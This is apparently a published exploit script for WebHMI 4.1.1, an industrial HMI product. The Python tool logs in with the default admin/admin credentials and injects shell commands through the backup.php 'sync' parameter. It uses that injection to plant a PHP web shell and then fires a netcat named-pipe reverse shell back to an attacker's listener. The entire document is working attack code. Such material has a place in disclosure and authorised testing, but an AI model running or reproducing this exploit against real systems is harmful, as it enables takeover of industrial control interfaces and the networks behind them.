WebHMI 4.1.1 Remote Code Execution

`# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)  
# Date: 03/01/2022  
# Exploit Author: Antonio Cuomo (arkantolo)  
# Vendor Homepage: https://webhmi.com.ua/en/  
# Version: WebHMI 4.1.1.7662  
# Tested on: WebHMI-4.1.1.7662  
  
#!/usr/bin/python  
import sys  
import re  
import argparse  
import requests  
import time  
import subprocess  
  
print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")  
print("Level2 account must be enabled !\n");  
  
login = "admin"   
password = "admin"  
  
class Exploit:  
  
def __init__(self, target_ip, target_port, localhost, localport):  
self.target_ip = target_ip  
self.target_port = target_port  
self.localhost = localhost  
self.localport = localport  
  
def exploitation(self):  
reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""  
payload = "<?php+system($_GET['c']);+?>"  
  
headers_login = {  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',  
'Accept': 'application/json, text/javascript, */*; q=0.01',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/json',  
'X-WH-LOGIN': login,  
'X-WH-PASSWORD': password,  
'X-Requested-With': 'XMLHttpRequest',  
'Connection': 'close',  
'Content-Length': '0'  
}  
  
url = 'http://' + target_ip + ':' + target_port   
r = requests.Session()  
  
print('[*] Resolving URL...')  
r1 = r.get(url)  
time.sleep(3)  
  
print('[*] Trying to log in...')  
r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)  
time.sleep(3)  
  
print('[*] Login redirection...')  
login_cookies = {  
'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],  
'X-WH-CHECK-TRIAL':'true',  
'il18next':'en',  
}  
r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)  
time.sleep(3)  
  
print('[*] Bypassing basedir...')  
for i in range(0, len(payload)):  
#print(payload[i])  
rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies)  
time.sleep(0.2)  
  
print('[*] Setting up listener...')  
listener = subprocess.Popen(["nc", "-nlp", self.localport])  
time.sleep(2)  
  
print('[*] Executing payload...')  
time.sleep(1)  
print('[*] Waiting reverse shell...')  
r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies)  
  
if (r4.status_code == 200):  
print('[*] Got shell!')  
while True:  
listener.wait()  
else:  
print('[-] Something went wrong!')  
listener.terminate()  
  
def get_args():  
parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)')  
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')  
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')  
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')  
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')  
args = parser.parse_args()  
return args  
  
args = get_args()  
target_ip = args.url  
target_port = args.target_port  
localhost = args.localhost  
localport = args.localport  
  
exp = Exploit(target_ip, target_port, localhost, localport)  
exp.exploitation()  
  
  
`